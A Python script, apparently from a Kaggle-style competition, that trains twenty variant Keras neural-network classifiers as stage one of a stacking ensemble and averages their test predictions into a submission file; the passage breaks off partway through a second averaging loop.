from stacking.base import BaseModel, XGBClassifier, KerasClassifier
########### First stage ###########
# FEATURE LISTS in Stage 1.
FEATURE_LIST_stage1 = {
'train':('data/output/features/ikki_features_train_NN_ver3.csv',
'data/output/features/ikki_one_hot_encoder_train_ver3.csv',
),#target is in 'train'
'test':('data/output/features/ikki_features_test_NN_ver3.csv',
'data/output/features/ikki_one_hot_encoder_test_ver3.csv',
),
}
X,y,test = load_data(flist=FEATURE_LIST_stage1, drop_duplicates=True)
assert((False in X.columns == test.columns) == False)
nn_input_dim_NN = X.shape[1]
del X, y, test
# Models in Stage 1
PARAMS_V1 = {
'batch_size':256,
'nb_epoch':35,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV1(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=120, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=120,output_dim=280, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=280,output_dim=100, init='uniform', activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.4))
model.add(Dense(input_dim=100,output_dim=2, init='uniform', activation='softmax'))
#model.add(Activation('softmax'))
sgd = SGD(lr=0.015, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V2 = {
'batch_size':512,
'nb_epoch':70,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV2(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=112, init='he_normal'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=112,output_dim=128, init='he_normal'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=128,output_dim=68, init='he_normal'))
model.add(LeakyReLU(alpha=.00003))
model.add(BatchNormalization())
model.add(Dropout(0.3))
model.add(Dense(input_dim=68,output_dim=2, init='he_normal'))
model.add(Activation('softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V3 = {
'batch_size':128,
'nb_epoch':72,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV3(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=310, init='he_normal'))
model.add(LeakyReLU(alpha=.001))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=310,output_dim=252, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=252,output_dim=128, init='he_normal'))
model.add(LeakyReLU(alpha=.001))
model.add(BatchNormalization())
model.add(Dropout(0.4))
model.add(Dense(input_dim=128,output_dim=2, init='he_normal', activation='softmax'))
#model.add(Activation('softmax'))
sgd = SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V4 = {
'batch_size':128,
'nb_epoch':56,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV4(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=62, init='he_normal'))
model.add(LeakyReLU(alpha=.001))
model.add(Dropout(0.3))
model.add(Dense(input_dim=62,output_dim=158, init='he_normal'))
model.add(LeakyReLU(alpha=.001))
model.add(Dropout(0.25))
model.add(Dense(input_dim=158,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
#model.add(Activation('softmax'))
sgd = SGD(lr=0.05, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V5 = {
'batch_size':216,
'nb_epoch':90,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV5(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=380, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.6))
model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V6 = {
'batch_size':216,
'nb_epoch':72,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV6(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=105, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=105,output_dim=280, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=280,output_dim=60, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V7 = {
'batch_size':128,
'nb_epoch':65,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV7(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=180, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=180,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=50,output_dim=30, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=30,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V8 = {
'batch_size':216,
'nb_epoch':89,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV8(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=140,output_dim=250, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=250,output_dim=90, init='uniform', activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.4))
model.add(Dense(input_dim=90,output_dim=2, init='uniform', activation='softmax'))
#model.add(Activation('softmax'))
sgd = SGD(lr=0.013, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V9 = {
'batch_size':512,
'nb_epoch':90,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV9(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=380, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V10 = {
'batch_size':216,
'nb_epoch':80,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV10(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=360, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=360,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V11 = {
'batch_size':384,
'nb_epoch':80,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV11(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=110,output_dim=350, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=350,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V12 = {
'batch_size':216,
'nb_epoch':82,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV12(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.3))
model.add(Dense(input_dim=110,output_dim=300, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=300,output_dim=60, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V13 = {
'batch_size':512,
'nb_epoch':90,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV13(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.1))
model.add(Dense(input_dim=100,output_dim=300, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.6))
model.add(Dense(input_dim=300,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V14 = {
'batch_size':216,
'nb_epoch':72,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV14(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=105, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=105,output_dim=200, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=200,output_dim=60, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.1))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V15 = {
'batch_size':128,
'nb_epoch':65,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV15(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=180, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=180,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=50,output_dim=40, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=40,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V16 = {
'batch_size':216,
'nb_epoch':89,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV16(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=140,output_dim=250, init='uniform'))
model.add(LeakyReLU(alpha=.00001))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=250,output_dim=90, init='uniform', activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.4))
model.add(Dense(input_dim=90,output_dim=2, init='uniform', activation='softmax'))
#model.add(Activation('softmax'))
sgd = SGD(lr=0.013, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V17 = {
'batch_size':512,
'nb_epoch':90,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV17(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=140,output_dim=380, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V18 = {
'batch_size':216,
'nb_epoch':80,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV18(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=100,output_dim=360, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=360,output_dim=50, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.1))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.007, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V19 = {
'batch_size':384,
'nb_epoch':80,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV19(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=110,output_dim=350, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=350,output_dim=150, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=150,output_dim=20, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.2))
model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.02, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
PARAMS_V20 = {
'batch_size':216,
'nb_epoch':82,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV20(BaseModel):
def build_model(self):
model = Sequential()
model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.3))
model.add(Dense(input_dim=110,output_dim=200, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(input_dim=200,output_dim=60, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.6))
model.add(Dense(input_dim=60,output_dim=80, init='he_normal'))
model.add(PReLU(init='zero'))
model.add(BatchNormalization())
model.add(Dropout(0.3))
model.add(Dense(input_dim=80,output_dim=2, init='he_normal', activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
return KerasClassifier(nn=model,**self.params)
if __name__ == "__main__":
m = ModelV1(name="v1_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V1,
kind = 's', fold_name='set1'
)
m.run()
m = ModelV2(name="v2_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V2,
kind = 's', fold_name='set2'
)
m.run()
m = ModelV3(name="v3_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V3,
kind = 's', fold_name='set3'
)
m.run()
m = ModelV4(name="v4_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V4,
kind = 's', fold_name='set4'
)
m.run()
m = ModelV5(name="v5_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V5,
kind = 's', fold_name='set5'
)
m.run()
m = ModelV6(name="v6_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V6,
kind = 's', fold_name='set6'
)
m.run()
m = ModelV7(name="v7_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V7,
kind = 's', fold_name='set7'
)
m.run()
m = ModelV8(name="v8_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V8,
kind = 's', fold_name='set8'
)
m.run()
m = ModelV9(name="v9_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V9,
kind = 's', fold_name='set9'
)
m.run()
m = ModelV10(name="v10_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V10,
kind = 's', fold_name='set10'
)
m.run()
m = ModelV11(name="v11_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V11,
kind = 's', fold_name='set11'
)
m.run()
m = ModelV12(name="v12_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V12,
kind = 's', fold_name='set12'
)
m.run()
m = ModelV13(name="v13_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V13,
kind = 's', fold_name='set13'
)
m.run()
m = ModelV14(name="v14_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V14,
kind = 's', fold_name='set14'
)
m.run()
m = ModelV15(name="v15_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V15,
kind = 's', fold_name='set15'
)
m.run()
m = ModelV16(name="v16_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V16,
kind = 's', fold_name='set16'
)
m.run()
m = ModelV17(name="v17_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V17,
kind = 's', fold_name='set17'
)
m.run()
m = ModelV18(name="v18_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V18,
kind = 's', fold_name='set18'
)
m.run()
m = ModelV19(name="v19_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V19,
kind = 's', fold_name='set19'
)
m.run()
m = ModelV20(name="v20_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V20,
kind = 's', fold_name='set20'
)
m.run()
print 'Done stage 1'
print 'Averaging'
# averaging
sample_sub = pd.read_csv('data/input/sample_submission.csv')
testID = sample_sub[['ID']]
a = pd.DataFrame()
for i in ['data/output/temp/v1_stage1_ver3_test.csv',
'data/output/temp/v2_stage1_ver3_test.csv',
'data/output/temp/v3_stage1_ver3_test.csv',
'data/output/temp/v4_stage1_ver3_test.csv',
'data/output/temp/v5_stage1_ver3_test.csv',
'data/output/temp/v6_stage1_ver3_test.csv',
'data/output/temp/v7_stage1_ver3_test.csv',
'data/output/temp/v8_stage1_ver3_test.csv',
'data/output/temp/v9_stage1_ver3_test.csv',
'data/output/temp/v10_stage1_ver3_test.csv',
'data/output/temp/v11_stage1_ver3_test.csv',
'data/output/temp/v12_stage1_ver3_test.csv',
'data/output/temp/v13_stage1_ver3_test.csv',
'data/output/temp/v14_stage1_ver3_test.csv',
'data/output/temp/v15_stage1_ver3_test.csv',
'data/output/temp/v16_stage1_ver3_test.csv',
'data/output/temp/v17_stage1_ver3_test.csv',
'data/output/temp/v18_stage1_ver3_test.csv',
'data/output/temp/v19_stage1_ver3_test.csv',
'data/output/temp/v20_stage1_ver3_test.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
#x['TARGET'] = (a.rank().mean(1))/a.shape[0]
# just averaging
x['TARGET'] = a.mean(1)
x = pd.concat([testID, x[['TARGET']]], axis=1)
x.to_csv('data/output/temp/test_NN_ikkiver3_variantA.csv', index=None)
#pubLB:
# averaging
a = pd.DataFrame()
train = pd.read_csv('data/input/train.csv')
targetID = train[['ID']]
for i in ['data/output/temp/v1_stage1_ver3_all_fold.csv',
